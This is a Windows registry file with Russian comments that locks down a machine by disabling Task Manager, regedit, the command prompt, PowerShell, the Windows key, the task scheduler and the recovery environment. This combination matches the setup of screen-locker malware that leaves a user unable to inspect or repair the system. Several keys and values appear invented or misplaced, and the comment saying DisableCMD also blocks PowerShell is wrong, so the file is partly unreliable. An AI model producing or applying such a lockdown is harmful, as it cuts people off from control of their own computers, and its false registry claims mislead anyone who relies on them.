Windows Registry Editor Version 5.00

; 1. Блокировка диспетчера задач
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

; 2. Блокировка планировщика задач
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableSchedTasks"=dword:00000001

; 3. Блокировка редактора реестра (regedit)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

; 4. Блокировка командной строки (cmd.exe) и PowerShell
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000002

; 5. Отключение клавиши Windows
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoWinKeys"=dword:00000001

; 6. Отключение среды восстановления (WinRE)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
"RecoveryDisabled"="1"

; 7. Отключение запуска PowerShell
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell]
"DisablePowerShell"=dword:00000001
